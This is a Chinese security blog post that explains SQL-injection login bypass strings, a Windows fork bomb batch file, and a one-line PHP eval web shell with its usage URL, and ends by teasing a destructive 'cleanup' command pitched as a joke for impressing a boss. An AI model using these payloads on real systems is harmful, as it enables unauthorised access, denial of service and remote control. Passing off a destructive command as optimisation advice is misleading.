「作者主页」:士别三日wyx
「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者
1. 万能密码
没错,就是字面意思,只需要知道账号,然后输入下面这行代码:
账号'and 1 -- a比如,很多网站的默认账号都是admin,我们就输入 admin'and 1 -- a,密码随便写:
点击登录,成功登录admin账号。
实际上,这是SQL注入的一种利用方式,对于存在注入点的网站,都可以使用。
一般来说,登录功能的代码都是下面这种格式:
select * from user where username = '' and password = '' limit 1,1我们输入的账号 admin'and 1 -- a和密码1,拼接到SQL里面:
select * from user where username = 'admin'and 1 -- a' and password = '1' limit 1,1-- 是注释,注释后面的内容不参与编译:
select * from user where username = 'admin'and 11 会被转化为 True
select * from user where username = 'admin'and True只要存在 admin 这个账号,SQL就能查询成功,从而实现登录。
2. 万能账号
上面的代码你得知道账号,但这个你连账号都不用知道:
a' or 1 -- a在账号处输入 a' or 1 -- a,密码随便写:
点击登录,成功。
原理跟上面大同小异,也是SQL注入的一种利用方式,适用于存在注入的网站。
参数拼接到SQL以后,是下面这样:
select * from user where username = 'a' or 1 -- a' and password = '' limit 1,1-- 注释后面不编译,1转换为True:
select * from user where username = 'a' or Trueor 是或的意思,两边有一个True,结果就返回True,实际执行的SQL是这样的:
select * from user where True3. fork炸弹
新建一个文本文件,输入 %0|%0
后缀名改成 .bat,有杀毒软件的话应该会提示,建议在虚拟机运行。
打开任务管理器后,双击运行。
你会看到先是CPU跑满,再是内存跑满,然后提示内存不足,然后……
原理其实很简单,就是不停的创建进程,创建速度可以参考小学三年级学过的指数增长。fork炸弹会不停的消耗资源,当资源耗尽时就会蓝屏或者黑屏,重启电脑就可以了。
提示:运行的同时执行taskkill /f /im cmd.exe,会有神奇的事情发生。
限制单个用户可创建的进程数上线,可以在一定程度上防止fork炸弹。
4. 一句话牧马
电影中,黑客通常会在别人电脑中植入后门程序,然后控制别人的电脑,听起来很酷对吧?实际上,最简单的后门,一行代码就够了。
以PHP为例,将包含这行代码的文件,上传到网站的web目录下:
eval($_GET['shell']);?>访问这个文件,就能控制别人了。
原理其实很简单,地址栏访问这个文件,利用参数传递命令:
127.0.0.1/shell.php?shell='ls'后台接收GET请求传递的参数:
<?php@eval('ls');?>配合@eval 函数可以执行系统命令,从而起到控制的效果。
5. 清理垃圾
PS:有粉丝反应,没有这行代码是没有灵魂的,那就再添一个吧。
很多公司在招聘员工的时候,都会要求应聘者有一定的优化能力。
当你的老板要求你优化代码,提升系统的运行效率时,就可以打出下面这行代码,获得大幅度升职加薪:
